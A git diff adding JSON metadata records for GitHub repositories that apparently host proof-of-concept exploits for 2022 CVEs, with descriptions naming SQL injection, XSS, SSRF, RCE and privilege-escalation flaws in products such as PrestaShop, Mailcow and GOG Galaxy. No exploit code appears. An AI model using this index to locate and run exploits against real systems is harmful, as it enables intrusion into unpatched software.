{ + "id": 510479826, + "name": "CVE-2022-30887", + "full_name": "MuallimNaci\/CVE-2022-30887", + "owner": { + "login": "MuallimNaci", + "id": 87265009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87265009?v=4", + "html_url": "https:\/\/github.com\/MuallimNaci", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MuallimNaci\/CVE-2022-30887", + "description": null, + "fork": false, + "created_at": "2022-07-04T19:24:56Z", + "updated_at": "2022-12-08T03:15:35Z", + "pushed_at": "2022-07-04T19:30:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30929.json b/2022/CVE-2022-30929.json new file mode 100644 index 0000000000..6fbd41dfd3 --- /dev/null +++ b/2022/CVE-2022-30929.json @@ -0,0 +1,33 @@ +[ + { + "id": 511398695, + "name": "CVE-2022-30929", + "full_name": "nanaao\/CVE-2022-30929", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/CVE-2022-30929", + "description": "CVE-2022-30929 POC", + "fork": false, + "created_at": "2022-07-07T05:44:56Z", + "updated_at": "2024-08-12T20:24:48Z", + "pushed_at": "2022-07-04T06:19:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31007.json b/2022/CVE-2022-31007.json new file mode 100644 index 0000000000..cef4901664 --- /dev/null +++ b/2022/CVE-2022-31007.json @@ -0,0 +1,33 @@ +[ + { + "id": 573197022, + "name": "CVE-2022-31007-Python-POC", + "full_name": "gregscharf\/CVE-2022-31007-Python-POC", + "owner": { + "login": "gregscharf", + "id": 5004742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5004742?v=4", + "html_url": "https:\/\/github.com\/gregscharf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gregscharf\/CVE-2022-31007-Python-POC", + "description": "elabFTW < 4.1.0 - account lockout bypass and login brute force", + "fork": false, + "created_at": "2022-12-01T22:53:59Z", + "updated_at": "2023-06-04T18:26:26Z", + "pushed_at": "2023-03-11T14:36:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31061.json b/2022/CVE-2022-31061.json new file mode 100644 index 0000000000..ed21502c8c --- /dev/null +++ b/2022/CVE-2022-31061.json @@ -0,0 +1,33 @@ +[ + { + "id": 522841282, + "name": "CVE-2022-31061", + "full_name": "Wangyanan131\/CVE-2022-31061", + "owner": { + "login": "Wangyanan131", + "id": 38024847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38024847?v=4", + "html_url": "https:\/\/github.com\/Wangyanan131", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wangyanan131\/CVE-2022-31061", + "description": "PoC for GLPI CVE-2022-31061", + "fork": false, + "created_at": "2022-08-09T07:09:52Z", + "updated_at": "2023-07-06T03:13:01Z", + "pushed_at": "2022-08-08T08:04:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31101.json b/2022/CVE-2022-31101.json new file mode 100644 index 0000000000..2c867eb446 --- /dev/null +++ b/2022/CVE-2022-31101.json @@ -0,0 +1,75 @@ +[ + { + "id": 517444481, + "name": "blmvuln", + "full_name": "MathiasReker\/blmvuln", + "owner": { + "login": "MathiasReker", + "id": 26626066, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26626066?v=4", + "html_url": "https:\/\/github.com\/MathiasReker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MathiasReker\/blmvuln", + "description": "Major Security Vulnerability on PrestaShop Websites - CVE-2022-31101", + "fork": false, + "created_at": "2022-07-24T21:50:13Z", + "updated_at": "2024-11-23T02:11:54Z", + "pushed_at": "2022-08-01T09:12:50Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-31101", + "free", + "module", + "php", + "prestashop" + ], + "visibility": "public", + "forks": 6, + "watchers": 41, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 522902710, + "name": "CVE-2022-31101", + "full_name": "karthikuj\/CVE-2022-31101", + "owner": { + "login": "karthikuj", + "id": 59091280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59091280?v=4", + "html_url": "https:\/\/github.com\/karthikuj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karthikuj\/CVE-2022-31101", + "description": "Exploit for PrestaShop bockwishlist module 2.1.0 SQLi (CVE-2022-31101)", + "fork": false, + "created_at": "2022-08-09T10:29:48Z", + "updated_at": "2024-08-12T20:26:01Z", + "pushed_at": "2022-08-09T14:55:35Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blockwishlist", + "cve-2022-31101", + "exploit", + "prestashop" + ], + "visibility": "public", + "forks": 13, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31138.json b/2022/CVE-2022-31138.json new file mode 100644 index 0000000000..c4e8bcddbf --- /dev/null +++ b/2022/CVE-2022-31138.json @@ -0,0 +1,33 @@ +[ + { + "id": 512647523, + "name": "Mailcow-CVE-2022-31138", + "full_name": "ly1g3\/Mailcow-CVE-2022-31138", + "owner": { + "login": "ly1g3", + "id": 105918602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105918602?v=4", + "html_url": "https:\/\/github.com\/ly1g3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ly1g3\/Mailcow-CVE-2022-31138", + "description": "Mailcow CVE-2022-31138", + "fork": false, + "created_at": "2022-07-11T06:53:24Z", + "updated_at": "2022-07-14T06:42:11Z", + "pushed_at": "2022-07-25T06:32:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31144.json b/2022/CVE-2022-31144.json new file mode 100644 index 0000000000..7889b72001 --- /dev/null +++ b/2022/CVE-2022-31144.json @@ -0,0 +1,33 @@ +[ + { + "id": 596929868, + "name": "CVE-2022-31144", + "full_name": "SpiralBL0CK\/CVE-2022-31144", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2022-31144", + "description": "CVE-2022-31144 dos pt redis, not finished yet or too soon, this can be turned into rce but oh well if you smart enough", + "fork": false, + "created_at": "2023-02-03T08:40:38Z", + "updated_at": "2023-04-02T16:26:54Z", + "pushed_at": "2023-02-03T11:18:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31181.json b/2022/CVE-2022-31181.json new file mode 100644 index 0000000000..7fc287e745 --- /dev/null +++ b/2022/CVE-2022-31181.json @@ -0,0 +1,39 @@ +[ + { + "id": 517931760, + "name": "lblfixer_cve_2022_31181", + "full_name": "drkbcn\/lblfixer_cve_2022_31181", + "owner": { + "login": "drkbcn", + "id": 2090227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2090227?v=4", + "html_url": "https:\/\/github.com\/drkbcn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drkbcn\/lblfixer_cve_2022_31181", + "description": "Module for PrestaShop 1.6.1.X\/1.7.X to fix CVE-2022-31181 \/ CVE-2022-36408 vulnerability (Chain SQL Injection)", + "fork": false, + "created_at": "2022-07-26T05:55:53Z", + "updated_at": "2022-08-11T15:25:27Z", + "pushed_at": "2022-07-28T07:14:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "patch", + "prestashop", + "prestashop-module", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31188.json b/2022/CVE-2022-31188.json new file mode 100644 index 0000000000..f2b8c1883d --- /dev/null +++ b/2022/CVE-2022-31188.json @@ -0,0 +1,33 @@ +[ + { + "id": 534599866, + "name": "CVE-2022-31188", + "full_name": "emirpolatt\/CVE-2022-31188", + "owner": { + "login": "emirpolatt", + "id": 41807762, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41807762?v=4", + "html_url": "https:\/\/github.com\/emirpolatt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emirpolatt\/CVE-2022-31188", + "description": "CVE-2022-31188 - OpenCV CVAT (Computer Vision Annotation Tool) SSRF", + "fork": false, + "created_at": "2022-09-09T10:36:59Z", + "updated_at": "2024-08-12T20:26:53Z", + "pushed_at": "2022-09-09T11:26:24Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31245.json b/2022/CVE-2022-31245.json new file mode 100644 index 0000000000..54719f44bf --- /dev/null +++ b/2022/CVE-2022-31245.json @@ -0,0 +1,33 @@ +[ + { + "id": 494413902, + "name": "Mailcow-CVE-2022-31245", + "full_name": "ly1g3\/Mailcow-CVE-2022-31245", + "owner": { + "login": "ly1g3", + "id": 105918602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105918602?v=4", + "html_url": "https:\/\/github.com\/ly1g3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ly1g3\/Mailcow-CVE-2022-31245", + "description": "CVE-2022-31245: RCE and domain admin privilege escalation for Mailcow", + "fork": false, + "created_at": "2022-05-20T10:05:55Z", + "updated_at": "2024-08-12T20:23:25Z", + "pushed_at": "2022-07-25T06:33:54Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31262.json b/2022/CVE-2022-31262.json new file mode 100644 index 0000000000..2c843e59a3 --- /dev/null +++ b/2022/CVE-2022-31262.json @@ -0,0 +1,33 @@ +[ + { + "id": 523845397, + "name": "CVE-2022-31262", + "full_name": "secure-77\/CVE-2022-31262", + "owner": { + "login": "secure-77", + "id": 31564517, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31564517?v=4", + "html_url": "https:\/\/github.com\/secure-77", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secure-77\/CVE-2022-31262", + "description": "GOG Galaxy LPE Exploit", + "fork": false, + "created_at": "2022-08-11T19:33:02Z", + "updated_at": "2023-01-30T19:54:24Z", + "pushed_at": "2022-08-12T10:39:48Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31269.json b/2022/CVE-2022-31269.json new file mode 100644 index 0000000000..c0d506d7e0 --- /dev/null +++ b/2022/CVE-2022-31269.json @@ -0,0 +1,64 @@ +[ + { + "id": 524722171, + "name": "CVE-2022-31269", + "full_name": "Henry4E36\/CVE-2022-31269", + "owner": { + "login": "Henry4E36", + "id": 41940481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4", + "html_url": "https:\/\/github.com\/Henry4E36", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Henry4E36\/CVE-2022-31269", + "description": "Nortek Control Linear eMerge E3-Series 信息泄露", + "fork": false, + "created_at": "2022-08-14T16:23:54Z", + "updated_at": "2023-07-12T02:08:15Z", + "pushed_at": "2022-08-14T16:30:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 540468718, + "name": "CVE-2022-31269", + "full_name": "omarhashem123\/CVE-2022-31269", + "owner": { + "login": "omarhashem123", + "id": 70245773, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70245773?v=4", + "html_url": "https:\/\/github.com\/omarhashem123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omarhashem123\/CVE-2022-31269", + "description": "CVE-2022-31269 Proof of Concept", + "fork": false, + "created_at": "2022-09-23T14:04:20Z", + "updated_at": "2022-10-04T17:58:05Z", + "pushed_at": "2022-11-06T10:00:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31294.json b/2022/CVE-2022-31294.json new file mode 100644 index 0000000000..b44cad34ae --- /dev/null +++ b/2022/CVE-2022-31294.json @@ -0,0 +1,33 @@ +[ + { + "id": 503081000, + "name": "CVE-2022-31294", + "full_name": "bigzooooz\/CVE-2022-31294", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-31294", + "description": "Online Discussion Forum Site 1.0 - Account Takeover", + "fork": false, + "created_at": "2022-06-13T19:03:04Z", + "updated_at": "2024-08-12T20:24:07Z", + "pushed_at": "2022-06-13T19:10:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31295.json b/2022/CVE-2022-31295.json new file mode 100644 index 0000000000..601a4f537f --- /dev/null +++ b/2022/CVE-2022-31295.json @@ -0,0 +1,33 @@ +[ + { + "id": 503084844, + "name": "CVE-2022-31295", + "full_name": "bigzooooz\/CVE-2022-31295", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-31295", + "description": "Online Discussion Forum Site 1.0 - IDOR \/ Delete any post", + "fork": false, + "created_at": "2022-06-13T19:16:13Z", + "updated_at": "2024-08-12T20:24:07Z", + "pushed_at": "2022-06-13T19:19:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31296.json b/2022/CVE-2022-31296.json new file mode 100644 index 0000000000..4d8090f68a --- /dev/null +++ b/2022/CVE-2022-31296.json @@ -0,0 +1,33 @@ +[ + { + "id": 503086292, + "name": "CVE-2022-31296", + "full_name": "bigzooooz\/CVE-2022-31296", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-31296", + "description": "Online Discussion Forum Site 1.0 - Blind SQL Injection", + "fork": false, + "created_at": "2022-06-13T19:21:04Z", + "updated_at": "2024-08-12T20:24:07Z", + "pushed_at": "2022-06-13T19:23:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31297.json b/2022/CVE-2022-31297.json new file mode 100644 index 0000000000..4d57ed0738 --- /dev/null +++ b/2022/CVE-2022-31297.json @@ -0,0 +1,33 @@ +[ + { + "id": 503087633, + "name": "CVE-2022-31297", + "full_name": "bigzooooz\/CVE-2022-31297", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-31297", + "description": "Haraj Script 3.7 - Reflected XSS", + "fork": false, + "created_at": "2022-06-13T19:25:41Z", + "updated_at": "2024-08-12T20:24:07Z", + "pushed_at": "2022-06-13T19:26:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31298.json b/2022/CVE-2022-31298.json new file mode 100644 index 0000000000..f6882ab010 --- /dev/null +++ b/2022/CVE-2022-31298.json @@ -0,0 +1,33 @@ +[ + { + "id": 503088951, + "name": "CVE-2022-31298", + "full_name": "bigzooooz\/CVE-2022-31298", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-31298", + "description": "Haraj Script 3.7 - Authenticated Stored XSS", + "fork": false, + "created_at": "2022-06-13T19:30:12Z", + "updated_at": "2024-08-12T20:24:07Z", + "pushed_at": "2022-06-13T19:30:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31299.json b/2022/CVE-2022-31299.json new file mode 100644 index 0000000000..7120e348be --- /dev/null +++ b/2022/CVE-2022-31299.json @@ -0,0 +1,33 @@ +[ + { + "id": 503089609, + "name": "CVE-2022-31299", + "full_name": "bigzooooz\/CVE-2022-31299", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-31299", + "description": "Haraj Script 3.7 - Reflected XSS", + "fork": false, + "created_at": "2022-06-13T19:32:23Z", + "updated_at": "2024-08-12T20:24:07Z", + "pushed_at": "2022-06-13T19:32:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31300.json b/2022/CVE-2022-31300.json new file mode 100644 index 0000000000..9d943ad8a6 --- /dev/null +++ b/2022/CVE-2022-31300.json @@ -0,0 +1,33 @@ +[ + { + "id": 503092569, + "name": "CVE-2022-31300", + "full_name": "bigzooooz\/CVE-2022-31300", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-31300", + "description": "Haraj Script 3.7 - DM Section Authenticated Stored XSS", + "fork": false, + "created_at": "2022-06-13T19:42:37Z", + "updated_at": "2024-08-12T20:24:07Z", + "pushed_at": "2022-06-13T19:43:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31301.json b/2022/CVE-2022-31301.json new file mode 100644 index 0000000000..61bef1dd82 --- /dev/null +++ b/2022/CVE-2022-31301.json @@ -0,0 +1,33 @@ +[ + { + "id": 503093863, + "name": "CVE-2022-31301", + "full_name": "bigzooooz\/CVE-2022-31301", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-31301", + "description": "Haraj Script 3.7 - Post Ads Authenticated Stored XSS", + "fork": false, + "created_at": "2022-06-13T19:47:04Z", + "updated_at": "2024-08-12T20:24:07Z", + "pushed_at": "2022-06-13T19:47:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31402.json b/2022/CVE-2022-31402.json new file mode 100644 index 0000000000..ca935e4c62 --- /dev/null +++ b/2022/CVE-2022-31402.json @@ -0,0 +1,33 @@ +[ + { + "id": 501886053, + "name": "CVE-2022-31402", + "full_name": "YavuzSahbaz\/CVE-2022-31402", + "owner": { + "login": "YavuzSahbaz", + "id": 101733340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101733340?v=4", + "html_url": "https:\/\/github.com\/YavuzSahbaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YavuzSahbaz\/CVE-2022-31402", + "description": "CVE-2022-31402", + "fork": false, + "created_at": "2022-06-10T03:23:58Z", + "updated_at": "2022-08-30T00:30:17Z", + "pushed_at": "2022-06-10T03:28:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31403.json b/2022/CVE-2022-31403.json new file mode 100644 index 0000000000..b406115ff1 --- /dev/null +++ b/2022/CVE-2022-31403.json @@ -0,0 +1,33 @@ +[ + { + "id": 502141677, + "name": "CVE-2022-31403", + "full_name": "IbrahimEkimIsik\/CVE-2022-31403", + "owner": { + "login": "IbrahimEkimIsik", + "id": 53093499, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53093499?v=4", + "html_url": "https:\/\/github.com\/IbrahimEkimIsik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IbrahimEkimIsik\/CVE-2022-31403", + "description": null, + "fork": false, + "created_at": "2022-06-10T18:22:07Z", + "updated_at": "2022-12-08T18:52:56Z", + "pushed_at": "2022-12-11T21:05:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31479.json b/2022/CVE-2022-31479.json new file mode 100644 index 0000000000..c557979c39 --- /dev/null +++ b/2022/CVE-2022-31479.json @@ -0,0 +1,33 @@ +[ + { + "id": 548704340, + "name": "CVE-2022-31479-test", + "full_name": "realyme\/CVE-2022-31479-test", + "owner": { + "login": "realyme", + "id": 87516973, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87516973?v=4", + "html_url": "https:\/\/github.com\/realyme", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/realyme\/CVE-2022-31479-test", + "description": "testtesttesttesttesttesttesttesttesttest", + "fork": false, + "created_at": "2022-10-10T03:47:18Z", + "updated_at": "2022-10-10T03:47:18Z", + "pushed_at": "2022-10-10T03:47:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31499.json b/2022/CVE-2022-31499.json new file mode 100644 index 0000000000..a84d7c93ac --- /dev/null +++ b/2022/CVE-2022-31499.json @@ -0,0 +1,33 @@ +[ + { + "id": 540471948, + "name": "CVE-2022-31499", + "full_name": "omarhashem123\/CVE-2022-31499", + "owner": { + "login": "omarhashem123", + "id": 70245773, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70245773?v=4", + "html_url": "https:\/\/github.com\/omarhashem123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omarhashem123\/CVE-2022-31499", + "description": "CVE-2022-31499 Proof of Concept", + "fork": false, + "created_at": "2022-09-23T14:11:30Z", + "updated_at": "2022-09-27T04:16:10Z", + "pushed_at": "2022-11-06T10:00:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31626.json b/2022/CVE-2022-31626.json new file mode 100644 index 0000000000..5c34aeb1eb --- /dev/null +++ b/2022/CVE-2022-31626.json @@ -0,0 +1,33 @@ +[ + { + "id": 575043244, + "name": "CVE-2022-31626", + "full_name": "amitlttwo\/CVE-2022-31626", + "owner": { + "login": "amitlttwo", + "id": 55759090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55759090?v=4", + "html_url": "https:\/\/github.com\/amitlttwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amitlttwo\/CVE-2022-31626", + "description": null, + "fork": false, + "created_at": "2022-12-06T16:19:03Z", + "updated_at": "2024-07-24T10:16:49Z", + "pushed_at": "2024-05-19T08:47:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31629.json b/2022/CVE-2022-31629.json new file mode 100644 index 0000000000..d4ca9ad52b --- /dev/null +++ b/2022/CVE-2022-31629.json @@ -0,0 +1,33 @@ +[ + { + "id": 547156570, + "name": "CVE-2022-31629-poc", + "full_name": "silnex\/CVE-2022-31629-poc", + "owner": { + "login": "silnex", + "id": 24711610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24711610?v=4", + "html_url": "https:\/\/github.com\/silnex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/silnex\/CVE-2022-31629-poc", + "description": "CVE-2022-31629 POC", + "fork": false, + "created_at": "2022-10-07T08:15:23Z", + "updated_at": "2024-04-08T08:36:16Z", + "pushed_at": "2022-10-08T08:24:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } 